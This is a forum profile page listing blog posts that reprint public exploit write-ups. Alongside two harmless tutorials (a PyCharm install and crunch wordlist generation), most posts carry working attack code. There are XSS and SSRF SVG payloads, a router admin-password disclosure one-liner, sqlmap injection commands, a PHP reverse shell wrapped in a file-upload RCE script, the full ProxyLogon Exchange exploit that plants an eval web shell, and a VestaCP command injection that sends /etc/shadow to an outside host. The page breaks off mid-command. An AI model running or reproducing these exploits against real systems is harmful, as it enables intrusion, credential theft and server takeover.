Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting # Date: 1/30/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=1220 # Version: 1.8.22 # Tested on: Windows 10 # CVE: CVE-2021-28115 1. Description: This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS. 2. Proof of Concept: - Go to a user profile - Add feedback and leave the following payload as comment "><script>alert(1)</script> - View the feedback feedback.php?uid=2 - When clicking Edit payload will execute
  2. HireHackking

    NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation # Date: 01.03.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.nucom.es Vendor: NUEVAS COMUNICACIONES IBERIA, S.A. Product web page: https://www.nucom.es Affected version: 5.07.90_multi_NCM01 5.07.89_multi_NCM01 5.07.72_multi_NCM01 Summary: The NC routers upgrades your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players. Desc: The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint and disclose the http super password (admin credentials) in Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages. Tested on: GoAhead-Webs Tenda Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5629 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php 01.03.2021 -- lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \ > curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \ > -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \ > grep -oP '(?<=http_supper_passwd=).*' | \ > base64 -d 2>/dev/null | \ > xargs echo -n ; \ > echo -e '\n-----------\n' The admin password is: MammaMia123 ----------- lqwrm@metalgear:~/prive$
  3. HireHackking

    Atlassian JIRA 8.11.1 - User Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Title: Atlassian JIRA 8.11.1 - User Enumeration # Author: Dolev Farhi # Vulnerable versions: version < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0 # CVE: CVE-2020-14181 # Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies. import sys import os import requests def help(): print('python3 script.py <target> <usernames_file>') print('e.g. python3 script.py https://jiratarget.com usernames.txt') sys.exit() if len(sys.argv) < 3: help() server = sys.argv[1] usernames = sys.argv[2] random_user = '0x00001' try: os.path.exists(usernames) except: print(usernames, 'file does not exist.') sys.exit(1) def test_vulnerable(): resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) if 'User does not exist: {}'.format(random_user) in resp.text: return True return False if test_vulnerable is False: print('server is not vulnerable.') sys.exit(1) f = open(usernames, 'r').read() for username in f.splitlines(): resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) if 'User does not exist' not in resp.text: print('EXISTS', username)
  4. HireHackking

    bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path # Date: 2021-1-19 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://carolcoral.github.io/no-free_vpn/ # Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe # Version: Version 2.5.1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "waselvpnserv" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: waselvpnserv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : waselvpnserv DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  5. HireHackking

    CouchCMS 2.2.1 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload # Date: 2021-01-25 # Exploit Author: xxcdd # Vendor Homepage: https://github.com/CouchCMS/CouchCMS # Software Link: https://github.com/CouchCMS/CouchCMS # Version: v2.2.1 # Tested on: Windows 7 An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload. upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en <http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en> xss.svg content: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg>
  6. HireHackking

    Title: Kali2022 Install PyCharm

    HireHackking posted a blog entry in Hacker Technology
    PyCharm is an integrated Python development environment tool. Ability to debug, generate and run code. Pycharm is an indispensable tool for python developers. Environmental Requirements Minimum 2 GB memory, recommended 8 GB memory 1024x768 Minimum screen resolution Python 2.7, or Python 3.5 or higher This article will be installed in Kali 2022. Download Installation Pack First, we go to PyCharm's official website to download the installation package, https://www.jetbrains.com/pycharm/download/#section=windows Currently, Pycharm provides versions of three different operating systems. Here we choose KALI as the operating system, so click Linux Select the community version, Download After we wait for the download to complete, we copy it into kali. Execute the following command to decompress the file. tar -zxvf pycharm-community-2022.1.3.tar.gz Run cd bin #Enter bin directory ./Agree to Agreement send anonymous ststististic Perfect running
  7. HireHackking

    Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated) # Exploit Author: Richard Jones # Date: 2021-03-11 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Usage. # Change Target_IP, REV_IP, REV_PORT to your own import requests def main(): ##### Change info here ##### TARGET_IP="127.0.0.1" REV_IP="127.0.0.1" REV_PORT=9999 ############################ LOGIN="/asistorage/login.php" MAILING_LIST="/asistorage/modules/random/index.php?view=add" UPLOAD_URL="/asistorage/modules/random/upload.php" VIEW_ITEM="/asistorage/modules/random/index.php" CALL_URL="/asistorage/modules/random/uploads/" s = requests.Session() def phpshell(): return """ <?php // Copyright (c) 2020 Ivan Å incek // v1.1 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. header('Content-Type: text/plain; charset=UTF-8'); class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $options = array(); // proc_open() options private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this->addr = $addr; $this->port = $port; if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; $this->options['bypass_shell'] = true; // we do not want a shell within a shell } else { echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; exit(0); } } private function daemonize() { set_time_limit(0); // do not impose the script execution time limit if (!function_exists('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; } else { if (($pid = pcntl_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; } else if ($pid > 0) { echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; exit(0); } else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; } else { echo "DAEMONIZE: Completed successfully!\n"; } } umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { echo $data; // script's dump if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $size = fstat($input)['size']; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT $size -= $this->offset($input, $iname, $this->clen); // we do not like that $this->clen = 0; } $fragments = ceil($size / $this->buffer); // number of fragments to read $remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) { echo $data; // script's dump } } private function offset($stream, $name, $offset) { $total = $offset; while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream $offset -= $this->buffer; } return $offset > 0 ? $total - $offset : $total; } public function run() { $this->daemonize(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC_ERROR: {$errno}: {$errstr}\n"; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); if (!$process) { echo "PROC_ERROR: Cannot start the shell\n"; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); while (!$this->error) { if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC_ERROR: Shell connection has been terminated\n"; break; } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed\n"; break; } else if ($num_changed_streams > 0) { if ($this->os === 'LINUX') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } // change the host address and/or port number as necessary $reverse_shell = new Shell('OLDIP', OLDPORT); $reverse_shell->Run(); ?>""" def login(url,username, password): try: data = { "uname":username, "upass":password, "btnlogin":"" } r = s.post(url,data=data, verify=False) page = r.text if "Invalid Username or Password, please try again." in page: return False else: return True except : return False def uploadShell(url): s.get(f"{url}{MAILING_LIST}") # Call page fileData = { 'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")} data={ "pname":"", "pname":"a", 'cutoff':'', 'cutoff':'a', 'projectname':'', 'type':'a', 'projectname':'', 'dsend':'2029-03-19', 'desc':'a', 'MAX_FILE_SIZE':100000, 'Uploader':'', } up_url=f"{url}{UPLOAD_URL}" r = s.post(up_url, files=fileData,data=data, verify=False) if r.status_code == 200: print("shell uploaded") else: print("Shell upload failed") exit(0) r = s.get(f"{url}{VIEW_ITEM}") page = r.text DL_URL=page.split("download.php?filename=")[1].split("\">")[0] return DL_URL #Login base_url=f"http://{TARGET_IP}" login_url=f"{base_url}{LOGIN}" b=login(login_url, "jim", "jim") if not b: print("Login failed, Try again...") exit(0) #CAll shell base=f"{base_url}" CALL_URL_PART=uploadShell(base) c_url=f"{base}{CALL_URL}{CALL_URL_PART}" s.get(c_url) #Shell can be found at http:/TARGET//asistorage/modules/random/uploads/ if __name__ == "__main__": main()
  8. HireHackking

    Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Steps. 1. Run sqlmap "sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch 2. Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin= Exploit paths: Database: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs Tables: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables [11 tables] +------------+ | accounts | | attendance | | contacts | | employee | | gallery | | msexcel | | msppt | | msword | | oic | | random | | sign | +------------+
  9. HireHackking

    Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) # Exploit Author : Enes Özeser # Exploit Date: 2021-02-28 # Vendor Homepage : https://www.nsauditor.com/ # Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe # Version: 1.6.4.0 # Tested on: Windows 10 # Steps: 1- Run the python script. (payload.py) 2- Open payload.txt and copy content to clipboard. 3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 4- Register -> Enter Registeration Code 5- Paste clipboard into the "Key" or "Name". 6- Click on OK. 7- Crashed. ---> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 300 try: f = open("payload.txt","w") f.write(buffer) f.close() print "File created!" except: print "File cannot be created!"
  10. HireHackking

    Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) # Date: 2021-03-10 # Exploit Author: testanull # Vendor Homepage: https://www.microsoft.com # Version: MS Exchange Server 2013, 2016, 2019 # CVE: 2021-26855, 2021-27065 import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) if len(sys.argv) < 2: print("Usage: python PoC.py <target> <email>") print("Example: python PoC.py mail.evil.corp haxor@evil.corp") exit() requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = sys.argv[1] email = sys.argv[2] random_name = id_generator(3) + ".js" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx" shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>' legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a" autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email print("Attacking target " + target) print("=============================") print(legacyDnPatchByte.decode('hex')) FQDN = "EXCHANGE" ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False) if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: FQDN = ct.headers["X-FEServer"] ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, data=autoDiscoverBody, verify=False ) if ct.status_code != 200: print("Autodiscover Error!") exit() if "<LegacyDN>" not in ct.content: print("Can not get LegacyDN!") exit() legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0] print("Got DN: " + legacyDn) mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "User-Agent": user_agent }, data=mapi_body, verify=False ) if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content: print("Mapi Error!") exit() sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0] print("Got SID: " + sid) proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent }, data=proxyLogon_request, verify=False ) if ct.status_code != 241 or not "set-cookie" in ct.headers: print("Proxylogon Error!") exit() sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] print("Got session id: " + sess_id) print("Got canary: " + msExchEcpCanary) ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, sess_id, msExchEcpCanary), "User-Agent": user_agent }, verify=False ) if ct.status_code != 200: print("Wrong canary!") print("Sometime we can skip this ...") rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0] # print "Got rbacRole: "+ rbacRole print("=========== It means good to go!!!====") ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False ) if ct.status_code != 200: print("GetOAB Error!") exit() oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0] print("Got OAB id: " + oabId) oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False ) if ct.status_code != 200: print("Set external url Error!") exit() reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False ) if ct.status_code != 200: print("Write Shell Error!") exit() print("Successful!")
  11. HireHackking

    VestaCP 0.9.8 - 'v_sftp_licence' Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection # Date: 17.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 POST /edit/server/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 6633 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded User-Agent: USER_AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Cookie: PHPSESSID=HERE_COOKIE sec-gpc: 1 token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow
  12. HireHackking

    CouchCMS 2.2.1 - Server-Side Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload # Date: 2021-01-25 # Exploit Author: xxcdd # Vendor Homepage: https://github.com/CouchCMS/CouchCMS # Software Link: https://github.com/CouchCMS/CouchCMS # Version: v2.2.1 # Tested on: Windows 7 An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload. upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en ssrf.svg content: <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns=" http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="200" width="200" xlink:href="http://<test_ip>:1234" /> </svg>
  13. HireHackking

    Title: crunch detailed guide

    HireHackking posted a blog entry in Hacker Technology
    Crunch In renal penetration testing and various brute force cracking, we need a variety of password dictionaries. The dictionaries on github are diverse, but none of them suit you. So, how to make your own dictionary file? Crunch is a tool developed in C language that can create customizable word lists. In this article, we will explain the use of Crunch in detail. Installation Crunch is installed on Kali Linux by default. If other systems are also installed using the apt command. apt-get install crunch runs crunch to generate dictionary, requiring us to enter the minimum and maximum values of the word to be generated and the output file, which will automatically take the lowercase alphabet as a character set and generate the dictionary. Example 1 Generate the shortest length and the longest length is 3 lengths. crunch 1 3 -o kali.txt Custom letters and numeric characters Of course, we can combine letters and numbers. as follows: crunch 5 7 pass123 -o kali.txt code description: Arrange and combine the seven letters and numbers of p a s s 1 2 3 to generate a dictionary with the shortest 5 digits and the longest 7 digits. Create a dictionary with symbols @ : Will insert lowercase characters , will insert capital characters % : will insert the number ^ : will caret Fixed Word + 3 Numbers Suppose we want to fix the first 3 letters as bbs, and insert random number combinations in each word with 6 characters and the last 3 positions, then we can do it by specifying the pattern. crunch 6 6 -t bbs%%% -o num.txt Fixed Word + 3 capital letters Suppose we want to fix the first 3 letters as bbs, and insert a random combination of capital letters in each word with 6 characters and the last 3 positions, then it can be done in the following way crunch 6 6 -t bbs, -o kali.txt Fixed Word + 3 lowercase letters crunch 6 6 -t bbs@@@ -o kali.txt Fixed Word + 3 Symbols crunch 6 6 -t bbs^^^ -o kali.txt Lowercase letters (a, b or c) + digits (1, 2 or 3) + symbols (ANY) In the following example, abc and 123 are used. Also use the + operator. We want to create a dictionary where the first character is lowercase, the number is the second character, and the symbol is the third character, but only a, b or c is the character, 1, 2 or 3 is the number and any random symbol at the last position, the command is as follows: crunch 3 3 abc + 123 -t @%^ -o kali.txt Two numbers (1, 2, or 3) + lowercase letters (ANY) + symbols (ANY) Similarly, to create a 2-digit digit 4-character pattern per word (including only 1, 2, or 3) + lowercase letters + symbols, we can do this: crunch 4 4 + + 123 + -t %%@^ -o kali.txt At this time + + plays two placeholders Compressed word list Usually, word lists are too large in text formats, and gzip can be used to compress it to more than 60-70%. crunch 4 7 Pass123 -z gzip -o START
  14. HireHackking

    SOYAL 701 Server 9.0.1 - Insecure Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: 9.0.1 190322 8.0.6 181227 Summary: 701 Server is the program used to set up and configure LAN and IP based access control systems, from the COM port used to the quantity and type of controllers connected. It is also used for programming some of the more complex controllers such as the AR-716E and the AR-829E. Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Everyone' and 'Authenticated Users' group. Tested on: Microsoft Windows 10 Enterprise Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5633 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php 25.01.2021 -- C:\Program Files (x86)\701Server>cacls 